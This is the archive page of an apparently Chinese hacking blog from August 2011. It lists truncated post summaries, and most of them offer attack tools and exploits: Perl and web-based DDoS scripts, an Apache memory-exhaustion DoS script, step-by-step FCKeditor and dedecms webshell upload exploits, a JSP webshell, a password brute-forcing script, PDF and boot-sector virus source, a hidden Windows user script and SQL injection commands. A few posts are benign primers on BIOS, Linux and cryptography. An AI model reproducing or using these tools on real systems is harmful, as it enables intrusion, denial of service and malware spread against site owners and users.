2011 年 8月随笔档案 - Mr.Jim

摘要：html源码加密解密脚本html源码加密解密脚本点此转到html加密解密脚本阅读全文

posted @ 2011-08-31 14:12 Mr.Jim 阅读(525) 评论(0) 推荐(0) 编辑

摘要：#!usr/bin/perl#please dont edit this without including this.use IO::Socket::INET;print "Welcome to the Hyper Text Assault Script, or HTAS v1.0b";while... 阅读全文

posted @ 2011-08-30 14:01 Mr.Jim 阅读(250) 评论(0) 推荐(0) 编辑

伪装你的TTL值

摘要：许多入侵者在入侵前都会先判断主机的系统，而多数人都会使用Ping和Tracert命令来获得主机的TTL值，从而判断主机系统。具体方法：先Ping主机，获得TTL值，然后使用Tracert命令，获得连接到主机时经过的路由器数量，将Ping得到的TTL值加上经过路由器的数量，最后得出的就是主机的TTL值... 阅读全文

posted @ 2011-08-29 14:26 Mr.Jim 阅读(418) 评论(0) 推荐(0) 编辑

打造Windows超级隐藏用户

摘要：hide.vbsWScript.Sleep 10000set fso = createobject("scripting.filesystemobject")fso.GetParentFolderName(WScript.ScriptFullName)set ws=wscript.createobj... 阅读全文

posted @ 2011-08-28 15:09 Mr.Jim 阅读(195) 评论(0) 推荐(0) 编辑

BIOS跟CMOS的区别和联系

摘要：在日常操作和维护计算机的过程中，常常可以听到有关BIOS设置和CMOS设置的一些说法，许多人对BIOS和CMOS经常混为一谈。本文主要阐述对BIOS设置和CMOS设置在基本概念上的区分与联系。BIOS是什么?所谓BIOS，实际上就是微机的基本输入输出系统（Basic Input－Output Sys... 阅读全文

posted @ 2011-08-27 12:46 Mr.Jim 阅读(802) 评论(0) 推荐(0) 编辑

FCKeditor编辑器全版本上传漏洞

摘要：漏洞利用方法:1.创建一个htaccess文件:加入以下代码：SetHandler application/x-httpd-php2.使用编辑器上传htaccess文件.3.上传shell.php.gif4.上传后shell.php.gif, 会自动被改名为 shell_php.gif5.访问htt... 阅读全文

posted @ 2011-08-26 10:14 Mr.Jim 阅读(570) 评论(0) 推荐(0) 编辑

Linux入门手册

摘要：linux目录架构/ 根目录/bin 常用的命令 binary file 的目录/boot 存放系统启动时必须读取的档桉，包括核心 (kernel) 在内/boot/grub/menu.lst GRUB设置/boot/vmlinuz 内核/boot/initrd 核心解... 阅读全文

posted @ 2011-08-25 14:47 Mr.Jim 阅读(175) 评论(0) 推荐(0) 编辑

详解加密算法与密钥管理

摘要：密码系统的两个基本要素是加密算法和密钥管理。加密算法是一些公式和法则，它规定了明文和密文之间的变换方法。由于密码系统的反复使用，仅靠加密算法已难以保证信息的安全了。事实上，加密信息的安全可靠依赖于密钥系统，密钥是控制加密算法和解密算法的关键信息，它的产生、传输、存储等工作是十分重要的。 ----在信... 阅读全文

posted @ 2011-08-24 12:45 Mr.Jim 阅读(805) 评论(0) 推荐(0) 编辑

病毒命名的一般惯例

摘要：对病毒命名的一般惯例为前缀+病毒名+后缀。前缀表示该病毒发作的操作平台或者病毒的类型，而DOS下的病毒一般是没有前缀的；病毒名为该病毒的名称及其家族；后缀一般可以不要的，只是以此区别在该病毒家族中各病毒的不同，可以为字母，或者为数字以说明此病毒的大小：例如：WM.Cap.A，A表示在Cap病毒家族中... 阅读全文

posted @ 2011-08-23 14:13 Mr.Jim 阅读(460) 评论(0) 推荐(0) 编辑

DDoS攻击方式全面剖析

摘要：纵观网络安全攻击的各种方式方法，其中DDoS类的攻击会给你的网络系统造成更大的危害。因此，了解DDoS，了解它的工作原理及防范措施，是一个计算机网络安全技术人员应必修的内容之一。一、DDoS的概念要想理解DDoS的概念，我们就必须先介绍一下DoS（拒绝服务），DoS的英文全称是Denial of S... 阅读全文

posted @ 2011-08-21 21:43 Mr.Jim 阅读(265) 评论(0) 推荐(0) 编辑

Apache httpd的远程拒绝服务

摘要：#Apache httpd的远程拒绝服务 (耗光内存)# 将导致在远程端的内存交换到文件系统# 结束正运行在交换空间的进程# 远程系统将会变得不稳定use IO::Socket;use Parallel::ForkManager;sub usage {print "Apache httpd的远程拒绝... 阅读全文

posted @ 2011-08-20 21:56 Mr.Jim 阅读(921) 评论(0) 推荐(0) 编辑

提问的智慧（修正版）

摘要：这个是以前见过的一篇译文，写的挺好，我把里面部分错误的解释，以及死链改掉了，各位看看吧，按照文中的说法去提问，绝对会增加你问题的人气。目录引言提问前提问时仔细挑选论坛面向新手的网页论坛和IRC通常响应最快第二步，使用项目邮件列表使用明确而有意义的标题使之更易回复使用清晰、语法与... 阅读全文

posted @ 2011-08-19 13:10 Mr.Jim 阅读(195) 评论(0) 推荐(0) 编辑

一个蓝牙嗅探器的源码

摘要：package bluetoothSniffer;public class BTTestClass {static String addressString; // IP address to connect tostatic int addressPort; // port to ... 阅读全文

posted @ 2011-08-18 11:15 Mr.Jim 阅读(346) 评论(0) 推荐(0) 编辑

Scanner扫描器的源码

摘要：#include #include #include #define iPort 80//目标Web Server端口.#define szSign "500 13\r\nServer: Microsoft-IIS/5.0"//根据此标志来检查目标是否有漏洞#pragma comment(lib,"... 阅读全文

posted @ 2011-08-17 13:28 Mr.Jim 阅读(406) 评论(0) 推荐(0) 编辑

详解MySQL用户权限

摘要：一．权限表mysql数据库中的3个权限表：user 、db、 host权限表的存取过程是：1)先从user表中的host、 user、 password这3个字段中判断连接的IP、用户名、密码是否存在表中，存在则通过身份验证；2) 通过权限验证，进行权限分配时，按照user?db?tables_pr... 阅读全文

posted @ 2011-08-16 11:30 Mr.Jim 阅读(150) 评论(0) 推荐(0) 编辑

详解缓冲区溢出攻击以及防范方法

摘要：缓冲区溢出是一种在各种操作系统、应用软件中广泛存在普遍且危险的漏洞，利用缓冲区溢出攻击可以导致程序运行失败、系统崩溃等后果。更为严重的是，可以利用它执行非授权指令，甚至可以取得系统特权，进而进行各种非法操作。第一个缓冲区溢出攻击--Morris蠕虫，发生在十多年前，它曾造成了全世界6000多台网络服... 阅读全文

posted @ 2011-08-15 13:56 Mr.Jim 阅读(8039) 评论(0) 推荐(2) 编辑

前段时间闹的很凶的“长老”漏洞POC

摘要：poc.shMicrosoft Visual Studio Solution File, Format Version 10.00# Visual Studio 2008Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "poc", "poc\p... 阅读全文

posted @ 2011-08-14 09:33 Mr.Jim 阅读(356) 评论(0) 推荐(0) 编辑

传信网络开发网站的0day

摘要：网络上曾传言此网站超牛.防注入上传很难突破.后台system/login.asp也是进了ewebeditor也是防密码的好多大牛都很难搞的下但是试了一下这套源码并不像其所说的那么厉害，其实这个系统是可以sql注入的，并且是明文。只不过字段不太统一，14-20左右。自己测试。order by xx... 阅读全文

posted @ 2011-08-13 13:56 Mr.Jim 阅读(318) 评论(0) 推荐(0) 编辑

dedecms织梦最新0day

摘要：拿webshell的方法如下：网传的都是说要知道后台才能利用，但不用，只要 plus 目录存在，服务器能外连，就能拿shell.前题条件，必须准备好自己的dede数据库，然后插入数据：insert into dede_mytag(aid,normbody) values(1,''{dede:php}... 阅读全文

posted @ 2011-08-12 13:46 Mr.Jim 阅读(341) 评论(0) 推荐(0) 编辑

一个C++日历源码

摘要：includes#include #include #include #include #include using namespace std;void clrscr();void gotoxy(int,int);class calender{public:calender(int d=1,int... 阅读全文

posted @ 2011-08-11 22:04 Mr.Jim 阅读(426) 评论(0) 推荐(0) 编辑

【漏洞分析】WordPress任意文件上传漏洞

摘要：影响版本:WordPress 'image/jpeg','gif' => 'image/gif','png' => 'image/png','bmp' => 'image/bmp','tif|tiff' => 'image/tiff','ico' => 'image/x-icon','asf|as... 阅读全文

posted @ 2011-08-10 13:51 Mr.Jim 阅读(1694) 评论(0) 推荐(0) 编辑

一个PDF病毒的源代码

摘要：On Error Resume NextDim P 'Stores the path of the PDF file. It is declared because it needs to be global but it's first used by a procedure.Di... 阅读全文

posted @ 2011-08-09 13:46 Mr.Jim 阅读(435) 评论(0) 推荐(0) 编辑

DBO权限下的直接列目录脚本

摘要：有时候碰到dbo的的确存在找半天目录没找到的情况。当然有可能是web和db分离了，但是也不排除服务器文件目录太多而你一个不小心就没找到的情况。至于怎么把脚本传到服务器上去，办法很多，你可以随便找个已知的目录把代码echo进一个vbs脚本里面，如果觉得麻烦也可以上传到自己的空间里面然后直接down下来... 阅读全文

posted @ 2011-08-08 13:32 Mr.Jim 阅读(146) 评论(0) 推荐(0) 编辑

一个JSP大马的源码

摘要：写的不好，将就着用吧"," Thanks for your support"};String[] strFileManage = {"文件管理","File Management"};String[] strCommand = {"CMD 命令","Command Wind... 阅读全文

posted @ 2011-08-07 13:10 Mr.Jim 阅读(3672) 评论(0) 推荐(0) 编辑

PHP嗅探脚本

摘要：4ngle的大作，可以扫FTP\MYSQL\MSSQL\SSH密码。';print_r($a);echo '';}session_start();$type = in_array($_POST['type'], array('ftp','mysql','mssql','ssh')) ? $_POST... 阅读全文

posted @ 2011-08-06 12:53 Mr.Jim 阅读(1003) 评论(0) 推荐(0) 编辑

DOS环境下的一个引导型病毒

摘要：CSEG SEGMENTASSUME CS:CSEGBEGIN: MOV AX,CSCMP AX,0JZ STARTJMP FILE;********************************** DATADATE DB 00HPZ DB 77HTIME DW 200HJMPA DW 7C00... 阅读全文

posted @ 2011-08-05 11:09 Mr.Jim 阅读(181) 评论(0) 推荐(0) 编辑

Webshell DDOS [aspx版]

摘要：JOBTHREADSTATEHOSTPORTERR MSGACTION");int count = jobScheduler.Count;for (int i = 0; i "; break;case 1: dstate = "pause"; operate = ""; break;}}Respo... 阅读全文

posted @ 2011-08-04 09:59 Mr.Jim 阅读(453) 评论(0) 推荐(0) 编辑

ASP DDOS

摘要：数据大小："&Atk*Len(Tmp)/1024&" kb"Response.Write"发包速度："&Atk/(UseTime/1000)&" /s"Response.Write"花费时间："&UseTime&" 毫秒"%>给以上代码做相应的修改,上传到你的服务器运行,当然越多越好建议在同一个页... 阅读全文

posted @ 2011-08-03 20:16 Mr.Jim 阅读(139) 评论(0) 推荐(0) 编辑

PHP DDOS源码

摘要：index.phpPHP DoS, Coded by EXE你的 IP: (请勿以你的ip作为攻击目标)IP:Time:Port:发起DOS攻击后，请等待浏览器加载function.php";$max_time = $time+$exec_time;for($i=0;$i $max_time){br... 阅读全文

posted @ 2011-08-02 21:05 Mr.Jim 阅读(412) 评论(0) 推荐(0) 编辑

常用SQL注入命令

摘要：1.判断注入点是否存在; and 1=1 and 1=22.猜表一般的表的名称无非是admin adminuser user pass password 等..and 0(select count(*) from *)and 0(select count(*) from admin) ---判断是否... 阅读全文

posted @ 2011-08-01 12:19 Mr.Jim 阅读(764) 评论(0) 推荐(0) 编辑

08 2011 档案

公告